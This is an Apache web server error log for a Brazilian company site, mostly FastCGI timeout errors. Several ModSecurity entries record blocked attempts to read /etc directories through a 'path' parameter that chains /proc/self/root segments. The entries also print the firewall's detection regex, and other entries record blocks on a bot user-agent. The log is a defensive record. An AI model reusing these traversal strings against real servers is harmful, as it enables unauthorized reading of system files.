[Thu Mar 19 17:38:49.878742 2026] [:error] [pid 20435:tid 140411582465792] [client 74.7.243.128:60234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxe2ZJaM1-0uhhUQJNBMgAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:39:10.130058 2026] [proxy_fcgi:error] [pid 19655:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:39:31.136185 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:39:44.149784 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:56700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxfEAbLMZ6AikZjR9WD9gAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:39:53.029794 2026] [proxy_fcgi:error] [pid 21563:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38190] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:40:30.592114 2026] [proxy_fcgi:error] [pid 19655:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38246] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:40:53.977951 2026] [proxy_fcgi:error] [pid 21219:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38386] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:41:10.451934 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.244.43:52922] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxfZgbLMZ6AikZjR9WEIgAAABA"]
[Thu Mar 19 17:41:20.193258 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:41:55.245986 2026] [proxy_fcgi:error] [pid 5816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:42:19.998035 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38818] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:42:49.873714 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:43:49.566471 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:43:55.175536 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:59716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxgC9a6ubjKNq_cu4Z9ywAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:44:04.296803 2026] [access_compat:error] [pid 7893:tid 140411540502272] [client 216.73.216.191:61803] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 17:44:11.125794 2026] [proxy_fcgi:error] [pid 20435:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39490] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:44:32.121775 2026] [proxy_fcgi:error] [pid 7235:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39660] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:44:53.133784 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:45:15.134411 2026] [proxy_fcgi:error] [pid 21563:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40108] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:45:37.529800 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40342] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:46:08.561817 2026] [proxy_fcgi:error] [pid 19655:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40486] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:46:30.045854 2026] [proxy_fcgi:error] [pid 21219:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:46:44.951293 2026] [:error] [pid 19655:tid 140411624429312] [client 74.7.243.128:42072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxgtE1ujooLWdUDGy781QAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:46:51.319356 2026] [:error] [pid 19655:tid 140411624429312] [client 74.7.244.43:59628] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxgu01ujooLWdUDGy781wAAAE4"]
[Thu Mar 19 17:47:00.230281 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:47:22.147784 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41260] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:47:43.913808 2026] [proxy_fcgi:error] [pid 5816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41450] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:48:05.125794 2026] [proxy_fcgi:error] [pid 8307:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:48:26.129794 2026] [proxy_fcgi:error] [pid 20435:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41770] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:48:48.619072 2026] [proxy_fcgi:error] [pid 20435:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41972] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:49:10.721823 2026] [proxy_fcgi:error] [pid 21563:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42308] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:49:33.121328 2026] [proxy_fcgi:error] [pid 20435:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:49:54.575085 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.228.61:36204] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxhcQbLMZ6AikZjR9WEdQAAABQ"]
[Thu Mar 19 17:49:58.481805 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42826] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:50:20.121810 2026] [proxy_fcgi:error] [pid 8307:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43206] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:50:42.125833 2026] [proxy_fcgi:error] [pid 21563:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:51:07.525801 2026] [proxy_fcgi:error] [pid 7893:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43918] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:51:30.153843 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44074] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:51:34.022049 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:36452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxh1vXLqtnMIWvjpaJHXwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:51:57.785913 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44198] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:52:20.514064 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:52:31.651033 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.244.43:42846] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxiDxCii7xarUs8iHYTrAAAAhc"]
[Thu Mar 19 17:52:46.258307 2026] [proxy_fcgi:error] [pid 7545:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:53:08.581802 2026] [proxy_fcgi:error] [pid 8307:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:53:23.996564 2026] [:error] [pid 8307:tid 140411649607424] [client 74.7.243.128:60912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxiQ7-FhjpZGs9ba8qTtwAAAws"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 17:53:48.730008 2026] [proxy_fcgi:error] [pid 20435:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:54:33.481858 2026] [proxy_fcgi:error] [pid 20435:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45960] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:54:56.261825 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46102] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:55:18.131351 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46678] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:55:37.141967 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.228.61:54198] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxiyfu8EFLIOrSqIpvRKQAAAkQ"]
[Thu Mar 19 17:55:41.571136 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46824] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:56:03.125830 2026] [proxy_fcgi:error] [pid 21563:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46952] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:56:24.781833 2026] [proxy_fcgi:error] [pid 19655:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47062] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:56:58.929846 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47150] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:57:20.133824 2026] [proxy_fcgi:error] [pid 21219:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47246] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:57:41.198412 2026] [proxy_fcgi:error] [pid 7893:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47360] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:58:05.434685 2026] [proxy_fcgi:error] [pid 7893:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47452] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:58:27.127442 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47638] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:58:48.119368 2026] [proxy_fcgi:error] [pid 8307:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:59:09.129868 2026] [proxy_fcgi:error] [pid 8307:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:59:30.085849 2026] [proxy_fcgi:error] [pid 20435:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:59:56.345810 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:00:20.662047 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48232] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:00:42.136864 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48430] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:01:04.517845 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48618] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:01:28.509900 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:01:53.729923 2026] [proxy_fcgi:error] [pid 19655:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48980] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:02:26.181652 2026] [proxy_fcgi:error] [pid 21219:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49150] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:03:16.444521 2026] [proxy_fcgi:error] [pid 7893:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49248] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:03:39.941855 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49444] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:04:02.917870 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:04:26.837826 2026] [proxy_fcgi:error] [pid 7893:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:04:56.465768 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:05:43.792651 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50054] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:06:28.629928 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50212] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:07:08.868812 2026] [proxy_fcgi:error] [pid 7235:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50304] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:07:19.709915 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.228.61:34606] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxlh9a6ubjKNq_cu4Z-MAAAA0Y"]
[Thu Mar 19 18:07:30.277873 2026] [proxy_fcgi:error] [pid 20435:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50648] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:07:54.393856 2026] [proxy_fcgi:error] [pid 7893:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:08:40.058529 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50900] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:09:03.025632 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:09:24.929797 2026] [proxy_fcgi:error] [pid 21563:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:09:46.690023 2026] [proxy_fcgi:error] [pid 7893:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51156] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:10:23.467551 2026] [:error] [pid 19655:tid 140411666392832] [client 74.7.243.128:46720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxmP01ujooLWdUDGy79kQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 18:10:28.401838 2026] [proxy_fcgi:error] [pid 7545:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51216] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:10:51.541306 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51488] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:11:20.337789 2026] [proxy_fcgi:error] [pid 7545:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:11:34.206499 2026] [:error] [pid 8307:tid 140411658000128] [client 74.7.243.128:46248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxmhr-FhjpZGs9ba8qUSAAAAwo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 18:11:46.429846 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:12:15.017839 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51710] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:12:38.191537 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52216] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:13:16.609556 2026] [proxy_fcgi:error] [pid 21563:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52274] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:13:47.117810 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52370] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:14:37.289940 2026] [proxy_fcgi:error] [pid 21563:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:15:09.893990 2026] [proxy_fcgi:error] [pid 7235:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52510] AH01075: Error dispatching request to : (polling)
